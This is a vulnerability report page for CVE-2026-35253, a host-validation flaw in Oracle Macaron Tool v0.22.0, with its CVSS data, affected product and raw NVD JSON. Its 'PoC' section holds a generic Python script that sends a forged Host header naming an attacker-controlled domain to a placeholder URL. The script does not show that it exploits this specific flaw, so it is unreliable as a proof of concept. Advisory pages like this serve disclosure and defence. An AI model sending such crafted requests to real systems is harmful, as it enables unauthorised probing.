Security Vulnerability Report
CVE-2026-35253 CVSS 4.7 MEDIUM

Published: 2026-05-06 08:16:04
Last Modified: 2026-05-12 19:10:53

Description

Vulnerability in the Oracle Macaron Tool product of Oracle Open Source Projects. The supported version that is affected is v0.22.0. Easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Macaron Tool. Successful attacks of this vulnerability can result in Oracle Macaron Tool failing host address validation.

CVSS Details

CVSS Score: 4.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:macaron:0.22.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Macaron Tool v0.22.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
    import requests

    # Target URL (Example)
    target_url = "http://example-vulnerable-app.com/api/endpoint"

    # Malicious Host header to bypass validation or cause SSRF
    malicious_headers = {
        "Host": "attacker-controlled-domain.com",
        "User-Agent": "CVE-2026-35253-POC"
    }

    try:
        # Send request with crafted headers
        response = requests.get(target_url, headers=malicious_headers, timeout=10)

        # Check response status and content
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print(f"[+] Response Content: {response.text[:200]}")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

References

https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35253", "sourceIdentifier": "[email protected]", "published": "2026-05-06T08:16:03.570", "lastModified": "2026-05-12T19:10:53.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Macoron Tool product of Oracle Open Source Projects. The supported versions that is affected is v0.22.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Macaron Tool. Successful attacks of this vulnerability can result in Oracle Macaron Tool failing host address validation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:macaron:0.22.0:*:*:*:*:*:*:*", "matchCriteriaId": "A4FA7633-EEE0-45F0-A83B-473403DF964E"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html", "source": "[email protected]", "tags": ["Not Applicable"]}]}}